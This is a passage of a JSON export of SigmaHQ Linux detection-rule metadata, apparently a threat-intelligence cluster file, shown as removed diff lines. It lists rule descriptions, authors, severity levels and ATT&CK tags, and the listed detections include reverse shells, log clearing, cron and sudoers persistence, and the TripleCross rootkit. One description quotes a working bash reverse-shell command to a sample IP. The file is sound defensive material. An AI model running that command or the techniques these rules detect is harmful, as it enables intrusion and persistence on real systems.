"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ] - }, - "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "value": "JexBoss Command Sequence" - }, - { - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/05", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_symlink_etc_passwd.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://www.qualys.com/2021/05/04/21nails/21nails.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" - ], - "tags": [ - "attack.t1204.001", - "attack.execution" - ] - }, - "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "value": "Symlink Etc Passwd" - }, - { - "description": "Detects the creation of doas.conf file in linux host platform.", - "meta": { - "author": "Sittikorn S, Teoderick Contreras", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_doas_conf_creation.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "value": "Linux Doas Conf File Creation" - }, - { - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": 
"2021/10/15", - "falsepositive": [ - "Any legitimate cron file." - ], - "filename": "file_create_lnx_persistence_cron_files.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "value": "Persistence Via Cron Files" - }, - { - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" - ], - "filename": "file_create_lnx_persistence_sudoers_files.yml", - "level": "medium", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ] - }, - "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "value": "Persistence Via Sudoers Files" - }, - { - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", - "level": "high", - "logsource.category": 
"file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", - "value": "Triple Cross eBPF Rootkit Default LockFile" - }, - { - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/05", - "falsepositive": [ - "Unlikely" - ], - "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", - "level": "high", - "logsource.category": "file_create", - "logsource.product": "linux", - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" - ] - }, - "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "value": "Triple Cross eBPF Rootkit Default Persistence" - }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "filename": "modsec_mulitple_blocks.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ] - }, - "uuid": 
"a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks" - }, - { - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/16", - "falsepositive": [ - "Unknown" - ], - "filename": "net_connection_lnx_back_connect_shell_dev.yml", - "level": "critical", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" - ], - "tags": "No established tags" - }, - "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "value": "Linux Reverse Shell Indicator" - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/26", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "filename": "net_connection_lnx_crypto_mining_indicators.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" - ], - "tags": "No established tags" - }, - "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "value": "Linux Crypto Mining Pool Connections" - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/03", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "filename": 
"net_connection_lnx_ngrok_tunnel.yml", - "level": "high", - "logsource.category": "network_connection", - "logsource.product": "linux", - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ] - }, - "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "value": "Communication To Ngrok Tunneling Service - Linux" - }, - { - "description": "Detects relevant ClamAV messages", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/01", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_clamav.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.001" - ] - }, - "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", - "value": "Relevant ClamAV Message" - }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_security_tools_disabling_syslog.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin" - }, - { - "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_ssh_cve_2018_15473.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1589" - ] - }, - "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", - "value": "SSHD Error Message CVE-2018-15473" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/16", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Workstations with frequently changing users" - ], - "filename": "lnx_susp_failed_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", - "value": "Failed Logins with Different Accounts from Single Source - Linux" - }, - { - "description": "Detects suspicious session with two users present", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_guacamole.yml", - 
"level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "1edd77db-0669-4fef-9598-165bda82826d", - "value": "Guacamole Two Users Sharing Session Anomaly" - }, - { - "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_named.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", - "value": "Suspicious Named Error" - }, - { - "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/30", - "falsepositive": [ - "Unknown" - ], - "filename": "lnx_susp_ssh.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - 
]
- },
- "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc",
- "value": "Suspicious OpenSSH Daemon Error"
- },
- {
- "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2017/07/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "lnx_susp_vsftp.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/dagwieers/vsftpd/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ]
- },
- "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe",
- "value": "Suspicious VSFTPD Error Messages"
- },
- {
- "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/06",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_at_command.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053.002"
- ]
- },
- "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b",
- "value": "Scheduled Task/Job At"
- },
- {
- "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text",
- "meta": {
- "author": "Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2020/10/19",
- "falsepositive": [
- "Legitimate activities"
- ],
- "filename": "proc_creation_lnx_base64_decode.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027"
- ]
- },
- "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031",
- "value": "Decode Base64 Encoded Text"
- },
- {
- "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell",
- "meta": {
- "author": "pH-T",
- "creation_date": "2022/07/26",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_base64_execution.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/arget13/DDexec",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140"
- ]
- },
- "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337",
- "value": "Linux Base64 Encoded Pipe to Shell"
- },
- {
- "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_base64_shebang_cli.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html",
- "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1140"
- ]
- },
- "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff",
- "value": "Linux Base64 Encoded Shebang In CLI"
- },
- {
- "description": "Detects the usage of the unsafe bpftrace option",
- "meta": {
- "author": "Andreas Hunkeler (@Karneades)",
- "creation_date": "2022/02/11",
- "falsepositive": [
- "Legitimate usage of the unsafe option"
- ],
- "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
- "https://bpftrace.org/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.004"
- ]
- },
- "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39",
- "value": "BPFtrace Unsafe Option Usage"
- },
- {
- "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/20",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_cat_sudoers.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/sleventyeleven/linuxprivchecker/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml"
- ],
- "tags": [
- "attack.reconnaissance",
- "attack.t1592.004"
- ]
- },
- "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06",
- "value": "Cat Sudoers"
- },
- {
- "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Administrator interacting with immutable files (e.g. for instance backups)."
- ],
- "filename": "proc_creation_lnx_chattr_immutable_removal.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1222.002"
- ]
- },
- "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12",
- "value": "Remove Immutable File Attribute"
- },
- {
- "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_clear_logs.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.002"
- ]
- },
- "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe",
- "value": "Clear Linux Logs"
- },
- {
- "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks",
- "meta": {
- "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/10/15",
- "falsepositive": [
- "Log rotation."
- ],
- "filename": "proc_creation_lnx_clear_syslog.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.002"
- ]
- },
- "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31",
- "value": "Commands to Clear or Remove the Syslog"
- },
- {
- "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n",
- "meta": {
- "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/10/15",
- "falsepositive": [
- "Legitimate usage of xclip tools."
- ],
- "filename": "proc_creation_lnx_clipboard_collection.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.packetlabs.net/posts/clipboard-data-security/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1115"
- ]
- },
- "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316",
- "value": "Clipboard Collection with Xclip Tool"
- },
- {
- "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_lnx_crontab_removal.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67",
- "value": "Remove Scheduled Cron Task/Job"
- },
- {
- "description": "Detects command line parameters or strings often used by crypto miners",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/10/26",
- "falsepositive": [
- "Legitimate use of crypto miners"
- ],
- "filename": "proc_creation_lnx_crypto_mining.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.poolwatch.io/coin/monero",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1",
- "value": "Linux Crypto Mining Indicators"
- },
- {
- "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/15",
- "falsepositive": [
- "Scripts created by developers and admins",
- "Administrative activity"
- ],
- "filename": "proc_creation_lnx_curl_usage.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105"
- ]
- },
- "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194",
- "value": "Curl Usage on Linux"
- },
- {
- "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.execution",
- "attack.t1190",
- "attack.t1059",
- "cve.2022.26134"
- ]
- },
- "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66",
- "value": "Atlassian Confluence CVE-2022-26134"
- },
- {
- "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
- "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
- "https://github.com/apache/spark/pull/36315/files",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.33891"
- ]
- },
- "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3",
- "value": "Apache Spark Shell Command Injection - ProcessCreation"
- },
- {
- "description": "Detects potential overwriting and deletion of a file using DD.",
- "meta": {
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
- "creation_date": "2021/10/15",
- "falsepositive": [
- "Any user deleting files that way."
- ],
- "filename": "proc_creation_lnx_dd_file_overwrite.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1485"
- ]
- },
- "uuid": "2953194b-e33c-4859-b9e8-05948c167447",
- "value": "DD File Overwrite"
- },
- {
- "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.",
- "meta": {
- "author": "Sittikorn S, Teoderick Contreras",
- "creation_date": "2022/01/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_lnx_doas_execution.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://research.splunk.com/endpoint/linux_doas_tool_execution/",
- "https://www.makeuseof.com/how-to-install-and-use-doas/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1548"
- ]
- },
- "uuid": "067d8238-7127-451c-a9ec-fa78045b618b",
- "value": "Linux Doas Tool Execution"
- },
- {
- "description": "Detects usage of system utilities to discover files and directories",
- "meta": {
- "author": "Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2020/10/19",
- "falsepositive": [
- "Legitimate activities"
- ],
- "filename": "proc_creation_lnx_file_and_directory_discovery.yml",
- "level": "informational",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1083"
- ]
- },
- "uuid": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72",
- "value": "File and Directory Discovery - Linux"
- },
- {
- "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/07",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_file_deletion.yml",
- "level": "informational",
- "logsource.category": "process_creation",
- "logsource.product": "linux",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1070.004"
- ]
- },
- "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57",
- "value": "File Deletion"
- },
- {
- "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s",
- "meta": {
- "author": "Ömer Günal, oscd.community",
- "creation_date": "2020/10/05",
- "falsepositive": [
- "Legitimate administration activities"
- ],
- "filename": "proc_creation_lnx_install_root_certificate.yml",
- "level": "low",
- "logsource.category": "process_creation",
